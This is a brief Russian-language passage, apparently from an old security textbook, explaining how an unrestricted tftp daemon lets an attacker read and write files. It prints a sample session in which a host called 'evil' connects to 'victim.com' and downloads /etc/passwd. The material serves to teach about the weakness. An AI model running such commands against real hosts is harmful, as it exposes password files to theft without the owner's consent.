Атака из Internet

         

Использование tftp


Существует также программа, подобная ftpd - tftpd. Этот демон не требует пароля для аутентификации. Если хост предоставляет tftp без ограничения доступа (обычно с помощью установок флагов безопасности в файле inetd.conf), то атакующий получает доступ по чтению и записи к любым файлам. Например, он может получить файл паролей с удаленной машины и разместить его в локальном каталоге /tmp:


evil % tftp


tftp> connect victim.com


tftp> get /etc/passwd /tmp/passwd.victim


tftp> quit

Это является атакой по сценарию 2.



Содержание раздела